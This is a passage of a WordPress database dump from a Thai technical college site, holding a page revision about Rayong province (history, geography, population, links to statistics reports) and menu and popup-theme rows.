lang=\"TH\">)</span></div>\r\n<div> จังหวัดระยองเริ่มมีการเปลี่ยนแปลงเป็นจังหวัดอุตสาหกรรม นับตั้งแต่ค้นพบก๊าซธรรมชาติ <span lang=\"TH\">ในอ่าวไทยเมื่อปี พ</span>.<span lang=\"TH\">ศ</span>. 2520 <span lang=\"TH\">เป็นการเริ่มต้นยุค </span>“<span lang=\"TH\">โชติช่วงชัชวาล</span>”<span lang=\"TH\"> และเป็นที่มาของ </span>“<span lang=\"TH\">โครงการพัฒนาพื้นที่ชายฝั่งทะเลภาคตะวันออก</span>”<span lang=\"TH\"> ( </span>Eastern Seaboard Development Program<span lang=\"TH\"> ) ในปี 2524 ช่วงระยะเวลาเกือบ 30 ปี ทำให้โครงสร้างทางเศรษฐกิจของจังหวัดระยองเปลี่ยนเป็นอุตสาหกรรมนำการท่องเที่ยวและเกษตรกรรม <span style=\"color: #0000ff;\">>>>></span></span><a href=\"https://sites.google.com/site/rayongshelter/khxmul-thawpi-canghwad-rayxng\"><span style=\"color: #0000ff;\">ข้อมูลเพิ่มเติม</span></a></div>\r\n<div></div>\r\n<div></div>\r\n<img class=\"aligncenter wp-image-826 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-06-39.jpg\" alt=\"\" width=\"696\" height=\"632\" />\r\n\r\n<img class=\"wp-image-827 size-full aligncenter\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-09-24.jpg\" alt=\"\" width=\"645\" height=\"271\" />\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">ขนาดและที่ตั้ง</span></b></span></h3>\r\n<div>\r\n<div>\r\n\r\n<span lang=\"TH\">จังหวัดระยองมีพื้นที่ประมาณ </span>3,552 <span lang=\"TH\">ตารางกิโลเมตร หรือ </span>2,220,000 <span lang=\"TH\">ไร่</span><span lang=\"TH\"> ตั้งอยู่ในภาคตะวันออกของประเทศไทยระหว่างเส้นรุ้งที่ </span>12-13 <span lang=\"TH\">องศาเหนือ และเส้นแวงที่ </span>101-102 <span lang=\"TH\">องศาตะวันออก ห่างจากกรุงเทพฯ ประมาณ </span>179 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> มีอาณาเขตติดต่อกับจังหวัดใกล้เคียงดังนี้</span>\r\n\r\n</div>\r\n</div>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศเหนือ </span></b><span lang=\"TH\"> ติดต่อกับเขตอำเภอหนองใหญ่ อำเภอบ่อทอง และอำเภอศรีราชา</span>ของจังหวัดชลบุรี\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศใต</span></b><span lang=\"TH\">้ จดทะเลอ่าวไทย พื้นที่ฝั่งทะเลยาวประมาณ </span>100 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> ของอ่าวไทย</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันออก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอท่าใหม่ อำเภอนายายอาม ของจังหวัดจันทบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันตก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอสัตหีบ อำเภอบางละมุง ของจังหวัดชลบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<strong><span style=\"color: #0000ff;\"> <a href=\"http://www.oceansmile.com/map/k/3178.gif\"><img class=\"aligncenter wp-image-830 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-44-46.jpg\" alt=\"\" width=\"1076\" height=\"707\" /></a> </span></strong>\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">การปกครองและประชากร</span></b></span></h3>\r\n<span lang=\"TH\">แบ่งเขตการปกครองเป็น</span> 8 <span lang=\"TH\">อำเภอ โดยประกอบด้วย</span> 54 <span lang=\"TH\">ตำบล</span> 439 <span lang=\"TH\">หมู่บ้าน</span> 80 <span lang=\"TH\">ชุมชน ส่วนด้านการปกครองท้องถิ่น ประกอบด้วย องค์การบริหารส่วนจังหวัด</span> 1 <span lang=\"TH\">แห่ง เทศบาลนคร</span> 1 <span lang=\"TH\">แห่ง เทศบาลเมือง</span> 2 <span lang=\"TH\">แห่ง เทศบาลตำบล 24 แห่ง และองค์การบริหารส่วนตำบล</span> 4<span lang=\"TH\">0 แห่ง ประชากรของจังหวัดระยอง ณ ธันวาคม </span>2558 <span lang=\"TH\">มีทั้งสิ้น</span> 688,999<span lang=\"TH\"> คน เป็นชาย 339</span>,333<span lang=\"TH\"> คน คิดเป็นร้อยละ</span>49.33 <span lang=\"TH\">เป็นหญิง 349,666 คน คิดเป็นร้อยละ</span> 50.67 <span lang=\"TH\">ของประชากรทั้งหมด อำเภอที่มีประชากรมากที่สุด คือ อำเภอเมือง มีจำนวน</span> 271,460 <span lang=\"TH\">คน อำเภอที่มีประชากรน้อยที่สุด คือ อำเภอเขาชะเมา มีจำนวน</span> 23,816<span lang=\"TH\"> คน จำนวนครัวเรือนทั้งจังหวัดรวม</span> 3<span lang=\"TH\">23</span>,<span lang=\"TH\">056 ครัวเรือน อำเภอเมืองระยองมีความหนาแน่นของประชากรมากที่สุด คือ</span> 527.60 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร รองลงมาคือ อำเภอบ้านฉาง</span>292.10 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร อำเภอที่มีประชากรหนาแน่นน้อยที่สุด คืออำเภอวังจันทร์ 65.8 คนต่อหนึ่งตารางกิโลเมตร จากการคาดการณ์ว่าประชากรของจังหวัดระยองจะเพิ่มเป็น</span> 698,017 <span lang=\"TH\">คนในปี</span> 2561 <span lang=\"TH\">แต่ในสภาพความเป็นจริง จังหวัดระยองมีประชากรมากกว่าตัวเลขในทะเบียนราษฎร์ไม่ต่ำกว่า</span> 300,000 <span lang=\"TH\">คน ทั้งนี้เกิดจากการอพยพเข้ามาในแรงงานภาคอุตสาหกรรมและการบริการ และมีแนวโน้มที่จะเพิ่มขึ้นอย่างรวดเร็วตามการเติบโตของภาคอุตสาหกรรม</span>\r\n<h3></h3>\r\n<h4><span style=\"color: #0000ff;\">ข้อมูลด้านประวัติศาสตร์ ภูมิศาสตร์ เศรษฐกิจ สังคม การศึกษา และสาระที่เป็นประโยชน์ด้านอื่น ๆ </span><span style=\"color: #0000ff;\">เกี่ยวกับจังหวัดระยองเพิ่มเติม >>>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h4>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"http://www.rayong.go.th/\"><img class=\"alignleft wp-image-831 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-38.jpg\" alt=\"\" width=\"698\" height=\"146\" /></a> </span></h3>\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/industry/index.php/th/\"><img class=\"alignleft wp-image-832 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-49.jpg\" alt=\"\" width=\"701\" height=\"116\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/rayong/\"><img class=\"alignleft wp-image-833 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-16.jpg\" alt=\"\" width=\"729\" height=\"123\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.fti-rayong.com/\"><img class=\"alignleft wp-image-834 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-28.jpg\" alt=\"\" width=\"424\" height=\"104\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.aecthaibiz.com/province/main.html?pv=21\"><img class=\"alignleft wp-image-835 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-38.jpg\" alt=\"\" width=\"422\" height=\"89\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h4><b><a href=\"http://rayong.cdd.go.th/project.html/JPT/JPT.htm\">ข้อมูลความจำเป็นพื้นฐานและข้อมูลพื้นฐาน</a> จังหวัดระยอง 2559</b></h4>\r\n<h4 class=\"contentheading\"><a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%202558-2561.pdf\">แผนพัฒนาจังหวัดระยอง 2558 - 2561</a></h4>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/vision%20in%20rayong%202554(news).pdf\">บรรยายสรุปจังหวัดระยอง</a></h4>\r\n</div>\r\n<h4><a href=\"http://klang.cgd.go.th/ryg/gpprayong.html\">GPP จังหวัดระยอง</a></h4>\r\n<a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=608&Itemid=199\"><strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง ปีงบประมาณ 2548-2558</strong></a>\r\n\r\n<strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง </strong><strong>ปีงบประมาณ 2555 </strong><strong> <a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A0%E0%B8%B2%E0%B8%A7%E0%B8%B0%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%A5%E0%B8%B1%E0%B8%87%E0%B8%88_%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%20%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%95%E0%B8%B8%E0%B8%A5%E0%B8%B2%E0%B8%84%E0%B8%A1%202555.pdf\">เดือนตุลาคม</a></strong>\r\n\r\n<strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง <a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A0%E0%B8%B2%E0%B8%A7%E0%B8%B0%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%A5%E0%B8%B1%E0%B8%87%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%20%E0%B8%9B%E0%B8%B5%202554.pdf\">ปีงบประมาณ 2554 </a> </strong>\r\n<h4><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1180:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2559</a></b></h4>\r\n<h4><span style=\"color: #0000ff; font-size: medium;\"><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1159:-2558&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2558</a></b></span></h4>\r\n<h4><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1134:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2557</a></b></h4>\r\n<h4><strong><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1133:-2556&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2556</a></strong></h4>\r\n<h4><strong><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1103:-2555&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2555</a></strong></h4>\r\n<h4><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1047:-2554&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2554</strong></a></h4>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1016:-2553&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2553</strong></a></h4>\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=910:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2552</strong></a></h4>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=764:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2551</strong></a></h4>\r\n</div>\r\n</div>', 'ข้อมูลพื้นฐานจังหวัด', '', 'inherit', 'closed', 'closed', '', '821-revision-v1', '', '', '2018-01-29 20:51:54', '2018-01-29 13:51:54', '', 821, 'http://www.technicrayong.ac.th/821-revision-v1/', 0, 'revision', '', 0),
(848, 3, '2018-01-29 21:02:49', '2018-01-29 14:02:49', '', 'ระบบสารสนเทศ', '', 'publish', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b0%e0%b8%9a%e0%b8%9a%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%99%e0%b8%97%e0%b8%a8', '', '', '2022-04-29 12:30:36', '2022-04-29 05:30:36', '', 0, 'http://www.technicrayong.ac.th/?p=848', 94, 'nav_menu_item', '', 0),
(849, 3, '2018-01-29 21:02:49', '2018-01-29 14:02:49', '', 'RMS 2016', '', 'publish', 'closed', 'closed', '', 'rms', '', '', '2022-04-29 12:30:36', '2022-04-29 05:30:36', '', 0, 'http://www.technicrayong.ac.th/?p=849', 95, 'nav_menu_item', '', 0),
(850, 3, '2018-01-29 21:02:49', '2018-01-29 14:02:49', '', 'V-COP', '', 'publish', 'closed', 'closed', '', 'v-cop', '', '', '2022-04-29 12:30:36', '2022-04-29 05:30:36', '', 0, 'http://www.technicrayong.ac.th/?p=850', 96, 'nav_menu_item', '', 0),
(851, 3, '2018-01-29 21:02:49', '2018-01-29 14:02:49', '', 'RTC-101MHz (R-Radio Network)', '', 'publish', 'closed', 'closed', '', 'r-radio-network', '', '', '2022-04-29 12:30:36', '2022-04-29 05:30:36', '', 0, 'http://www.technicrayong.ac.th/?p=851', 100, 'nav_menu_item', '', 0),
(852, 3, '2018-01-29 21:02:49', '2018-01-29 14:02:49', '', 'StudentCare', '', 'publish', 'closed', 'closed', '', 'studentcare', '', '', '2022-04-29 12:30:36', '2022-04-29 05:30:36', '', 0, 'http://www.technicrayong.ac.th/?p=852', 99, 'nav_menu_item', '', 0),
(857, 3, '2018-01-30 10:12:29', '2018-01-30 03:12:29', '', 'DataCenter', '', 'publish', 'closed', 'closed', '', 'datacenter', '', '', '2022-04-29 12:30:36', '2022-04-29 05:30:36', '', 0, 'http://www.technicrayong.ac.th/?p=857', 97, 'nav_menu_item', '', 0),
(858, 3, '2018-01-30 10:19:18', '2018-01-30 03:19:18', '', 'ฝ่ายบริหารวิทยาลัยฯ', '', 'publish', 'closed', 'closed', '', '%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b8%af', '', '', '2022-04-29 12:30:31', '2022-04-29 05:30:31', '', 0, 'http://www.technicrayong.ac.th/?p=858', 23, 'nav_menu_item', '', 0),
(859, 3, '2018-01-30 10:19:18', '2018-01-30 03:19:18', '', 'แผนกวิชา', '', 'publish', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2', '', '', '2022-04-29 12:30:34', '2022-04-29 05:30:34', '', 0, 'http://www.technicrayong.ac.th/?p=859', 59, 'nav_menu_item', '', 0),
(860, 3, '2018-01-30 10:27:12', '2018-01-30 03:27:12', '', 'ช่างยนต์/เทคนิคเครื่องกล', '', 'publish', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b9%80%e0%b8%84%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%81%e0%b8%a5-%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%a2', '', '', '2022-04-29 12:30:34', '2022-04-29 05:30:34', '', 0, 'http://www.technicrayong.ac.th/?p=860', 61, 'nav_menu_item', '', 0),
(861, 3, '2018-01-30 10:27:12', '2018-01-30 03:27:12', '', 'ช่างกลโรงงาน/เทคนิคการผลิต', '', 'publish', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b9%80%e0%b8%84%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b8%a5%e0%b9%81%e0%b8%a5', '', '', '2022-04-29 12:30:34', '2022-04-29 05:30:34', '', 0, 'http://www.technicrayong.ac.th/?p=861', 62, 'nav_menu_item', '', 0),
(862, 3, '2018-01-30 10:27:12', '2018-01-30 03:27:12', '', 'ช่างเชื่อม/เทคนิคโลหะ', '', 'publish', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b9%82%e0%b8%a5%e0%b8%ab%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a3-%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%8a%e0%b8%b7', '', '', '2022-04-29 12:30:34', '2022-04-29 05:30:34', '', 0, 'http://www.technicrayong.ac.th/?p=862', 63, 'nav_menu_item', '', 0),
(863, 3, '2018-01-30 10:27:12', '2018-01-30 03:27:12', '', 'ช่างไฟฟ้ากำลัง', '', 'publish', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b9%84%e0%b8%9f%e0%b8%9f%e0%b9%89%e0%b8%b2%e0%b8%81%e0%b8%b3%e0%b8%a5%e0%b8%b1%e0%b8%87-%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87', '', '', '2022-04-29 12:30:34', '2022-04-29 05:30:34', '', 0, 'http://www.technicrayong.ac.th/?p=863', 64, 'nav_menu_item', '', 0),
(864, 3, '2018-01-30 10:27:12', '2018-01-30 03:27:12', '', 'ช่างอิเล็กทรอนิกส์', '', 'publish', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%ad%e0%b8%b4%e0%b9%80%e0%b8%a5%e0%b9%87%e0%b8%81%e0%b8%97%e0%b8%a3%e0%b8%ad%e0%b8%99%e0%b8%b4%e0%b8%81%e0%b8%aa%e0%b9%8c', '', '', '2022-04-29 12:30:34', '2022-04-29 05:30:34', '', 0, 'http://www.technicrayong.ac.th/?p=864', 65, 'nav_menu_item', '', 0),
(865, 3, '2018-01-30 10:27:12', '2018-01-30 03:27:12', '', 'ช่างก่อสร้าง', '', 'publish', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%81%e0%b9%88%e0%b8%ad%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87-%e0%b8%8a%e0%b9%88%e0%b8%b2', '', '', '2022-04-29 12:30:34', '2022-04-29 05:30:34', '', 0, 'http://www.technicrayong.ac.th/?p=865', 67, 'nav_menu_item', '', 0),
(870, 3, '2018-01-30 10:27:13', '2018-01-30 03:27:13', '', 'การบัญชี', '', 'publish', 'closed', 'closed', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9a%e0%b8%b1%e0%b8%8d%e0%b8%8a%e0%b8%b5', '', '', '2022-04-29 12:30:35', '2022-04-29 05:30:35', '', 0, 'http://www.technicrayong.ac.th/?p=870', 74, 'nav_menu_item', '', 0),
(871, 3, '2018-01-30 10:27:13', '2018-01-30 03:27:13', '', 'การตลาด และธุรกิจค้าปลีก', '', 'publish', 'closed', 'closed', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%95%e0%b8%a5%e0%b8%b2%e0%b8%94', '', '', '2022-04-29 12:30:35', '2022-04-29 05:30:35', '', 0, 'http://www.technicrayong.ac.th/?p=871', 75, 'nav_menu_item', '', 0),
(872, 3, '2018-01-30 10:27:13', '2018-01-30 03:27:13', '', 'การเลขานุการ/การจัดการสำนักงาน', '', 'publish', 'closed', 'closed', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%a5%e0%b8%82%e0%b8%b2%e0%b8%99%e0%b8%b8%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2022-04-29 12:30:35', '2022-04-29 05:30:35', '', 0, 'http://www.technicrayong.ac.th/?p=872', 76, 'nav_menu_item', '', 0),
(873, 3, '2018-01-30 10:27:13', '2018-01-30 03:27:13', '', 'คอมพิวเตอร์ธุรกิจ', '', 'publish', 'closed', 'closed', '', '%e0%b8%84%e0%b8%ad%e0%b8%a1%e0%b8%9e%e0%b8%b4%e0%b8%a7%e0%b9%80%e0%b8%95%e0%b8%ad%e0%b8%a3%e0%b9%8c%e0%b8%98%e0%b8%b8%e0%b8%a3%e0%b8%81%e0%b8%b4%e0%b8%88', '', '', '2022-04-29 12:30:35', '2022-04-29 05:30:35', '', 0, 'http://www.technicrayong.ac.th/?p=873', 77, 'nav_menu_item', '', 0),
(874, 3, '2018-01-30 10:27:13', '2018-01-30 03:27:13', '', 'การจัดการโลจิสติกส์', '', 'publish', 'closed', 'closed', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%82%e0%b8%a5%e0%b8%88%e0%b8%b4%e0%b8%aa%e0%b8%95%e0%b8%b4%e0%b8%81%e0%b8%aa%e0%b9%8c', '', '', '2022-04-29 12:30:35', '2022-04-29 05:30:35', '', 0, 'http://www.technicrayong.ac.th/?p=874', 78, 'nav_menu_item', '', 0),
(875, 3, '2018-01-30 10:27:13', '2018-01-30 03:27:13', '', 'คหกรรมศาสตร์', '', 'publish', 'closed', 'closed', '', '%e0%b8%84%e0%b8%ab%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b9%8c', '', '', '2022-04-29 12:30:35', '2022-04-29 05:30:35', '', 0, 'http://www.technicrayong.ac.th/?p=875', 81, 'nav_menu_item', '', 0),
(876, 3, '2018-01-30 10:27:13', '2018-01-30 03:27:13', '', 'อาหารและโภชนาการ', '', 'publish', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%b2%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b9%82%e0%b8%a0%e0%b8%8a%e0%b8%99%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2022-04-29 12:30:35', '2022-04-29 05:30:35', '', 0, 'http://www.technicrayong.ac.th/?p=876', 80, 'nav_menu_item', '', 0),
(878, 3, '2018-01-30 10:27:13', '2018-01-30 03:27:13', '', 'การท่องเที่ยว', '', 'publish', 'closed', 'closed', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%97%e0%b8%b5%e0%b9%88%e0%b8%a2%e0%b8%a7', '', '', '2022-04-29 12:30:35', '2022-04-29 05:30:35', '', 0, 'http://www.technicrayong.ac.th/?p=878', 84, 'nav_menu_item', '', 0),
(879, 3, '2018-01-30 10:27:13', '2018-01-30 03:27:13', '', 'การโรงแรม', '', 'publish', 'closed', 'closed', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%81%e0%b8%a3%e0%b8%a1%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2022-04-29 12:30:35', '2022-04-29 05:30:35', '', 0, 'http://www.technicrayong.ac.th/?p=879', 83, 'nav_menu_item', '', 0),
(898, 1, '2018-01-30 18:17:44', '2018-01-30 11:17:44', '', 'Default Theme', '', 'publish', 'closed', 'closed', '', 'default-theme', '', '', '2018-01-30 19:03:25', '2018-01-30 12:03:25', '', 0, 'http://www.technicrayong.ac.th/popup_theme/default-theme/', 0, 'popup_theme', '', 0),
(899, 1, '2018-01-30 18:17:44', '2018-01-30 11:17:44', '', 'Light Box', '', 'publish', 'closed', 'closed', '', 'lightbox', '', '', '2018-01-30 18:17:44', '2018-01-30 11:17:44', '', 0, 'http://www.technicrayong.ac.th/popup_theme/lightbox/', 0, 'popup_theme', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(900, 1, '2018-01-30 18:17:44', '2018-01-30 11:17:44', '', 'Enterprise Blue', '', 'publish', 'closed', 'closed', '', 'enterprise-blue', '', '', '2018-01-30 18:17:44', '2018-01-30 11:17:44', '', 0, 'http://www.technicrayong.ac.th/popup_theme/enterprise-blue/', 0, 'popup_theme', '', 0),
(901, 1, '2018-01-30 18:17:44', '2018-01-30 11:17:44', '', 'Hello Box', '', 'publish', 'closed', 'closed', '', 'hello-box', '', '', '2018-01-30 18:17:44', '2018-01-30 11:17:44', '', 0, 'http://www.technicrayong.ac.th/popup_theme/hello-box/', 0, 'popup_theme', '', 0),
(902, 1, '2018-01-30 18:17:44', '2018-01-30 11:17:44', '', 'Cutting Edge', '', 'publish', 'closed', 'closed', '', 'cutting-edge', '', '', '2018-01-30 18:17:44', '2018-01-30 11:17:44', '', 0, 'http://www.technicrayong.ac.th/popup_theme/cutting-edge/', 0, 'popup_theme', '', 0),
